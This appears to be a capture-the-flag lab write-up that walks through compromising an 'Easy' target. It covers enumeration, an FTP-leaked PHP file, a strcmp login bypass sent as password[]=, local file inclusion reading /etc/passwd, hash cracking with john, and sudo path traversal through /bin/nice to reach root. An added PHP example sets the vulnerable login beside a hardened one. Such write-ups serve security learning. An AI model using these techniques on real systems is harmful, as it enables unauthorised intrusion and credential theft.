RATING
Easy
ENUMERATION
As usual, we start it off with our nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.164.101

Navigating to the target in our browser, we don't really find anything of interest. We proceed with a directory bruteforce using feroxbuster and discover /admin:
Command: feroxbuster -u http://192.168.164.101/ -w /usr/share/wordlists/dirb/common.txt -k --quiet

Navigating to http://192.168.164.101/admin, we find a login page. We try some defaults with no success. With no valid credentials, we move on:

We know from our nmap scans that anonymous FTP access is allowed on port 2112 and we know that there are 2 files that we can access, index.php.bak and welcome.msg. We download these locally to examine:
Command: ftp anonymous@192.168.164.101 2112
Command: mget index.php.bak
Command: mget welcome.msg

The welcome.msg file provides nothing of interest, but examining index.php.bak, we find something useful. A bit of research reveals that the way strcmp is used in the login check allows for an authentication bypass:
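To show why the check fails, here is an added illustration (not the target's index.php) of a login written with the loose strcmp comparison, beside a hardened version that rejects non-string input and verifies a stored hash; the user name, the secret and the variable names are constructed for the example.

```php
<?php
// Vulnerable form: strcmp() compared to 0 with the loose == operator.
// On PHP 5/7, strcmp("...", []) emits a warning and returns NULL, and
// NULL == 0 is true, so a request carrying password[]= passes the check
// without knowing the secret. (PHP 8 throws a TypeError here instead.)
function login_loose(string $user, $password, string $expected): bool
{
    return $user === 'admin' && @strcmp($password, $expected) == 0;
}

// Hardened form: insist on a string before comparing, and compare against
// a stored hash with password_verify(), which is constant-time and
// accepts only string input.
function login_strict(string $user, $password, string $expectedHash): bool
{
    if (!is_string($password)) {
        return false;
    }
    return $user === 'admin' && password_verify($password, $expectedHash);
}

$hash = password_hash('password', PASSWORD_DEFAULT); // constructed secret

var_dump(login_loose('admin', [], 'password'));      // bool(true)  -> bypass
var_dump(login_strict('admin', [], $hash));          // bool(false)
var_dump(login_strict('admin', 'wrong', $hash));     // bool(false)
var_dump(login_strict('admin', 'password', $hash));  // bool(true)
```

Any code that treats `$_POST` values as strings without checking should be reviewed the same way, since PHP happily turns `name[]=` into an array.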

EXPLOITATION
We navigate over to our login page and enter user admin and password password and capture the request with burp:


We modify the intercepted request, changing the password parameter to password[]="":

Forwarding this to the server, we are able to bypass authentication and log in:

Navigating to the dashboard, we see some menu options:

We head over to logs and see a few log entries. We can select a log file and view it:

Using burp, we intercept the request to view the log entry:

We can modify this request to perform a Local File Inclusion (LFI) and read the contents of /etc/passwd:


We save the hash obtained for webadmin to hash.txt and use john to crack it:
Command: john --wordlist=rockyou.txt hash.txt

With our cracked password dragon, we are able to SSH to our target as user webadmin:

PRIVILEGE ESCALATION
We check for sudo privileges and see that webadmin can run the files in /notes using /bin/nice:
Command: sudo -l

However, we are not able to write to the /notes directory:

We can, however, bypass this with directory traversal, since the sudo rule only matches the path prefix /notes/. We create a shell script in /home/webadmin and execute it using the following path:
Command: echo "/bin/bash" > exploit.sh
Command: chmod +x exploit.sh
Command: sudo /bin/nice /notes/../home/webadmin/exploit.sh

With this, we have a shell as root and can read our proof.txt.